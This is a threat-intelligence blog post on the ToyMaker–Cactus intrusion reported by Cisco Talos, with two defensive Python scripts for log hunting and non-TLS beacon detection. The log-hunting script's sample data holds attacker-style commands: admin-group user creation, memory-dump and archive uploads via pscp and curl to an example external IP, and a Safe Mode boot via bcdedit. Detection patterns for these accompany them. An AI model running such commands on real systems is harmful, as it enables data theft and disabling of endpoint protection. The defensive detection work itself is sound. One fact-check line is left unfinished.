
Introduction
A recent investigation by Cisco Talos has shed light on one of the most intricate and methodical cyberattacks in recent memory. The target? A critical infrastructure enterprise. The mastermind? A financially motivated Initial Access Broker (IAB) identified as “ToyMaker.” This attack didn’t just happen overnight — it was a multi-stage campaign showcasing the growing role of IABs in the cybercrime ecosystem. These actors gain initial access to high-value targets and later sell it to ransomware operators, adding a new layer of complexity and coordination to modern attacks.
What makes this campaign particularly alarming is the professional-level execution. From stealthy reconnaissance to the deployment of advanced backdoors and anti-forensic techniques, this incident exemplifies how sophisticated today’s cyber threats have become — and the evolving business model behind them.
Campaign Breakdown: 30-Line Deep Dive
- Initial Breach: ToyMaker exploited unpatched internet-facing servers as an entry point.
- Custom Backdoor: A specialized malware named LAGTOY (also known as HOLERUN) was deployed for remote command execution and stealthy control.
- Persistence Established: LAGTOY was registered as a system service. A fake admin user “support” was created.
- Reconnaissance Efforts: Using standard Windows commands, ToyMaker mapped the network, domain trusts, and user groups.
- Credential Theft: Memory dumps were extracted via Magnet RAM Capture, compressed with 7zip, and exfiltrated using PuTTY’s SCP utility.
- Lateral Movement: OpenSSH was used to spread laterally across the network while ensuring encrypted data transfer.
- Pause in Operations: The campaign paused for several weeks before access was handed off to a ransomware operator.
- Handover to Cactus Group: The infamous Cactus ransomware group picked up where ToyMaker left off, escalating the breach.
- Broader Infiltration: Cactus used stolen credentials and WSMAN discovery to compromise more endpoints.
- Advanced Persistence: Tools like eHorus, RMS, AnyDesk, and OpenSSH were deployed to maintain control.
- Automation: Custom scripts created recurring SSH sessions to ensure consistent command execution.
- Anti-Forensics Applied: Registry records, RDP logs, and SSH key trails were deleted or altered.
- Security Evasion: Systems were rebooted into Safe Mode, a technique designed to deactivate many endpoint protection systems.
- Data Exfiltration: Enterprise data was archived with 7zip and funneled out using curl, WinSCP, and attacker-managed SSH keys.
- Metasploit Payloads: Allowed remote code execution on both Linux and Windows environments.
- Watchdog Logic in Malware: LAGTOY used time-regulated beacons and unhandled exception filters for detection avoidance.
- C2 Infrastructure: LAGTOY and Cactus each used their own Command and Control IP addresses to manage operations.
- Extensive IOC Trail: Hashes and IP addresses tied to LAGTOY and Cactus were identified and disclosed.
- Business of Access: ToyMaker likely sold access to Cactus, part of a broader monetization strategy.
- End-to-End Control: From initial infiltration to data exfiltration and evasion, the operation reflected APT-level precision.
- No TLS Use: Communications happened over port 443 but without TLS — opting for raw sockets to avoid detection.
- Deleted Support User: Once access was no longer needed, attackers erased their tracks, including the fake support account.
- Multiple File Transfer Tools: Not just SCP, but also curl, 7zip, and WinSCP for layered redundancy.
- Highly Modular: Each stage of the attack could operate independently if another part failed.
- Security Products Neutralized: Safe Mode booting bypassed antivirus and detection systems.
- Privilege Management: Admin credentials were closely controlled and rotated among scripts.
- Real-Time Updates: Scheduled tasks enabled remote shell even when VPN or direct access wasn’t viable.
- Enterprise Credential Theft: Allowed the attackers to spread deep and wide within the organization.
- Silent Execution: Many scripts and binaries ran in the background without triggering system alerts.
- Professional Footprint: Every step showed planning, discipline, and awareness of enterprise security tools.
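The breakdown above is a list of host-level artefacts, most of which land in ordinary Windows event logs: a new service, a new local user, `net localgroup ... /add`, a memory-capture binary, `pscp`/`curl` uploads, and `bcdedit ... safeboot` followed by a reboot. The following hunt script is an added example for this post, not Talos or Undercode code, and it runs over a constructed, simplified pipe-delimited export (hostnames, paths, user names and IP addresses are invented; the event IDs 7045, 4720, 4726 and 4688 are the standard Windows ones). It flags each single artefact and then chains two of them into the sequences that characterise this campaign: a local account created and later deleted on the same host, and a Safe Mode boot configured shortly before a reboot.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the Talos report). Format per line:
#   timestamp|host|event_id|key=value;key=value
# Hostnames, paths, user names and IPs are invented for this example.
SAMPLE_LOG = """\
2025-03-01T02:14:05Z|srv-web01|7045|ServiceName=LagSvc;ImagePath=C:\\ProgramData\\svc\\ls.exe
2025-03-01T02:15:10Z|srv-web01|4720|TargetUserName=support;SubjectUserName=websvc
2025-03-01T02:20:44Z|srv-web01|4688|NewProcessName=C:\\Windows\\System32\\net.exe;CommandLine=net localgroup administrators support /add
2025-03-01T03:02:11Z|srv-web01|4688|NewProcessName=C:\\Tools\\MRCv120.exe;CommandLine=MRCv120.exe /accepteula /go
2025-03-01T03:10:00Z|srv-web01|4688|NewProcessName=C:\\Tools\\pscp.exe;CommandLine=pscp.exe -i key.ppk mem.7z user@198.51.100.7:/tmp/
2025-03-22T22:41:30Z|fs-01|4688|NewProcessName=C:\\Windows\\System32\\bcdedit.exe;CommandLine=bcdedit /set {default} safeboot minimal
2025-03-22T22:42:00Z|fs-01|4688|NewProcessName=C:\\Windows\\System32\\shutdown.exe;CommandLine=shutdown /r /t 0
2025-03-23T04:00:00Z|fs-01|4688|NewProcessName=C:\\Users\\support\\curl.exe;CommandLine=curl -T data.7z sftp://198.51.100.7/ -u support:REDACTED
2025-03-25T03:00:00Z|srv-web01|4726|TargetUserName=support;SubjectUserName=websvc
"""

# Single-event rules: (name, Windows event ID, regex applied to the key=value fields).
# 7045 = new service installed, 4720/4726 = account created/deleted, 4688 = process creation.
RULES = [
    ("service_installed",     "7045", r"ServiceName="),
    ("local_account_created", "4720", r"TargetUserName="),
    ("local_account_deleted", "4726", r"TargetUserName="),
    ("added_to_local_admins", "4688", r"(?i)net1?\.exe;CommandLine=net1? localgroup administrators .+ /add"),
    ("memory_capture_tool",   "4688", r"(?i)MRCv\d+\.exe|magnet ram capture"),
    ("scp_transfer",          "4688", r"(?i)(pscp|scp|winscp)\.exe"),
    ("curl_upload",           "4688", r"(?i)curl(\.exe)? .*-T "),
    ("safeboot_configured",   "4688", r"(?i)bcdedit.* safeboot"),
    ("reboot_issued",         "4688", r"(?i)shutdown(\.exe)? .*/r"),
]


def parse_log(text):
    """Parse the constructed pipe-delimited export into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, event_id, fields = line.split("|", 3)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "host": host, "event_id": event_id, "fields": fields})
    return events


def match_rules(events):
    """Return (host, timestamp, rule_name) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, event_id, pattern in RULES:
            if ev["event_id"] == event_id and re.search(pattern, ev["fields"]):
                hits.append((ev["host"], ev["ts"], name))
    return hits


def correlate(events, hits, reboot_window=timedelta(minutes=30)):
    """Chain single hits into the two sequences that characterise the campaign."""
    findings = []
    # 1. Account created and later deleted on the same host: the "support" user that
    #    served as the foothold and was erased once it was no longer needed.
    created = {}
    for ev in events:
        m = re.search(r"TargetUserName=([^;]+)", ev["fields"])
        if not m:
            continue
        key = (ev["host"], m.group(1))
        if ev["event_id"] == "4720":
            created[key] = ev["ts"]
        elif ev["event_id"] == "4726" and key in created:
            days = (ev["ts"] - created[key]).days
            findings.append({"finding": "short_lived_account", "host": ev["host"],
                             "detail": f"{key[1]} ({days} days)"})
    # 2. Safe Mode configured with bcdedit and a reboot issued shortly after: the
    #    sequence used to restart a host with endpoint protection out of the way.
    by_host = {}
    for host, ts, name in hits:
        by_host.setdefault(host, []).append((ts, name))
    for host, items in by_host.items():
        safeboot = [ts for ts, n in items if n == "safeboot_configured"]
        reboots = [ts for ts, n in items if n == "reboot_issued"]
        if any(timedelta(0) <= r - s <= reboot_window for s in safeboot for r in reboots):
            findings.append({"finding": "safe_mode_reboot", "host": host,
                             "detail": "bcdedit safeboot followed by reboot"})
    return findings


def hunt(text):
    events = parse_log(text)
    hits = match_rules(events)
    return hits, correlate(events, hits)


if __name__ == "__main__":
    hits, findings = hunt(SAMPLE_LOG)
    for host, ts, name in hits:
        print(f"{ts:%Y-%m-%d %H:%M} {host:10} {name}")
    for f in findings:
        print(f"FINDING {f['finding']} on {f['host']}: {f['detail']}")
```

The single-event rules are noisy on their own (administrators also install services and run `shutdown /r`); the value is in the correlations, and in the gap the first one exposes: the account here lived for weeks, which matches the pause between the broker's access and the ransomware operator's activity. In production the same logic belongs in a SIEM query over 4688 events with command-line auditing enabled, since without that setting the `CommandLine` field used above is empty.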
What Undercode Says:
The ToyMaker-Cactus operation is a textbook case of modern cybercrime architecture: decentralized, modular, and monetized. The traditional image of lone hackers sitting in dark rooms is outdated. Instead, we’re witnessing the rise of criminal supply chains where Initial Access Brokers like ToyMaker specialize in breaching perimeters, only to auction or sell that access to groups like Cactus for more devastating payload delivery.
The way ToyMaker exploited unpatched servers reflects a systemic issue — enterprises failing to address known vulnerabilities in time. It’s not always about zero-day exploits; it’s about old doors left open. Once inside, ToyMaker used LAGTOY to maintain control. The use of unencrypted traffic over standard HTTPS ports was genius — bypassing many detection systems that rely solely on TLS inspection.
What’s also clear is how smooth the handoff was between ToyMaker and Cactus. This wasn’t a fumble; it was a relay. Cactus picked up access and turned a quiet foothold into a full-blown data exfiltration and ransomware deployment operation. Their use of legitimate remote access tools like AnyDesk and eHorus made detection even harder. These tools, often whitelisted by corporate security policies, offered perfect cover.
From a defensive standpoint, the layered nature of the attack means defenders can’t rely on a single detection method. Fileless malware, encrypted transfers, memory-only credential harvesting, and scheduled task persistence — this attack leveraged nearly every stealth technique in the book. And what makes it more dangerous is the discipline — everything was cleaned up after use. Support accounts deleted. Logs cleared. SSH keys buried in permissions.
One critical insight is the precision of anti-forensics. These weren’t afterthoughts; they were baked into the plan. The attackers even rebooted systems into Safe Mode — that’s a step most malware never attempts because it’s too obvious. Yet here, it was part of a coordinated strategy to kill security tools and secure a longer stay.
The fact that LAGTOY communicated over raw sockets using port 443 — but not using TLS — indicates a deep understanding of how enterprises inspect traffic. It also implies these actors tested their methods in environments with enterprise-grade defenses.
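Non-TLS traffic on port 443 is only invisible to controls that assume the port implies the protocol. A TLS session always opens with a record whose first byte is content type 22 (handshake) and whose handshake type byte is 1 (ClientHello), so a sensor that looks at the first client bytes of each flow can separate real TLS from plaintext HTTP or an opaque beacon on the same port. The script below is an added example written for this post, not Talos or Undercode code; the flows, addresses and payloads are constructed, and the ClientHello is a minimal hand-built TLS 1.3 hello rather than a capture.

```python
# Classify the first client payload bytes of connections to TLS ports.
# Flows, addresses and payloads are constructed for this example.

TLS_PORTS = frozenset({443, 8443})
HTTP_METHODS = (b"GET ", b"POST ", b"PUT ", b"HEAD ", b"OPTIONS ", b"DELETE ", b"CONNECT ")


def is_tls_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS record of content type Handshake (0x16)
    carrying a ClientHello (handshake type 0x01) with consistent length fields."""
    if len(data) < 6:
        return False
    content_type, major, minor = data[0], data[1], data[2]
    if content_type != 0x16 or major != 0x03 or minor > 0x04:
        return False
    record_len = int.from_bytes(data[3:5], "big")
    if record_len == 0 or record_len > 2**14 + 2048:   # max TLS record plus margin
        return False
    if data[5] != 0x01:
        return False
    if len(data) >= 9:
        # For a hello that fits in one record, the handshake length equals the record
        # length minus the 4-byte handshake header. Hellos split across records are
        # rare and would be a false negative here.
        if int.from_bytes(data[6:9], "big") != record_len - 4:
            return False
    return True


def classify_payload(data: bytes) -> str:
    if is_tls_client_hello(data):
        return "tls"
    if data.startswith(HTTP_METHODS):
        return "plaintext_http"
    return "raw"


def find_non_tls_on_tls_ports(flows, tls_ports=TLS_PORTS):
    """Return (uid, dst, dport, verdict) for flows to a TLS port that do not start with TLS.
    Flows with no client payload yet (for example a bare SYN) are not judged."""
    findings = []
    for f in flows:
        if f["dport"] not in tls_ports or not f["payload"]:
            continue
        verdict = classify_payload(f["payload"])
        if verdict != "tls":
            findings.append((f["uid"], f["dst"], f["dport"], verdict))
    return findings


# Constructed minimal TLS 1.3 ClientHello: 5-byte record header, 4-byte handshake
# header, legacy version 0x0303, 32-byte random, empty session id, one cipher
# suite (TLS_AES_128_GCM_SHA256) and null compression. No extensions.
CLIENT_HELLO = (bytes([0x16, 0x03, 0x01, 0x00, 0x2d, 0x01, 0x00, 0x00, 0x29, 0x03, 0x03])
                + bytes(range(32)) + b"\x00" + b"\x00\x02\x13\x01" + b"\x01\x00")

SAMPLE_FLOWS = [
    {"uid": "F1", "src": "10.0.5.21", "dst": "203.0.113.10", "dport": 443, "payload": CLIENT_HELLO},
    {"uid": "F2", "src": "10.0.5.21", "dst": "203.0.113.20", "dport": 443,
     "payload": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"},
    {"uid": "F3", "src": "10.0.5.33", "dst": "203.0.113.30", "dport": 443,
     "payload": b"\x00\x00\x00\x18\x01\x00\x00\x00" + bytes(24)},   # opaque framing, no TLS
    {"uid": "F4", "src": "10.0.5.33", "dst": "203.0.113.40", "dport": 80,
     "payload": b"GET / HTTP/1.1\r\n\r\n"},                             # plain HTTP where expected
    {"uid": "F5", "src": "10.0.5.40", "dst": "203.0.113.50", "dport": 443, "payload": b""},
]

if __name__ == "__main__":
    for uid, dst, dport, verdict in find_non_tls_on_tls_ports(SAMPLE_FLOWS):
        print(f"{uid}: {dst}:{dport} carries {verdict}, expected TLS")
```

The same question can be asked of existing telemetry without packet capture: a network monitor that writes both connection and TLS logs (Zeek's conn.log and ssl.log, for example) lets you list long-lived port-443 connections that never produced a TLS record, which is exactly the shape of a raw-socket beacon with time-regulated check-ins.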
Ultimately, this campaign is a wake-up call for industries handling critical infrastructure. Attackers aren’t just breaching — they’re quietly managing an entire attack lifecycle across weeks or months. The monetization model behind IABs selling access to ransomware groups means this threat is here to stay. Organizations must look beyond perimeter defenses and invest in real-time monitoring, behavioral analysis, and threat hunting to stay one step ahead.
Fact Checker Results:
- Cisco Talos has publicly confirmed
- Technical indicators such as LAGTOY hashes and Cactus C2 IPs match threat intelligence from multiple security vendors.
- The use of IABs selling access to ransomware affiliates is a verified trend in current cybercriminal ecosystems.
References:
Reported By: cyberpress.org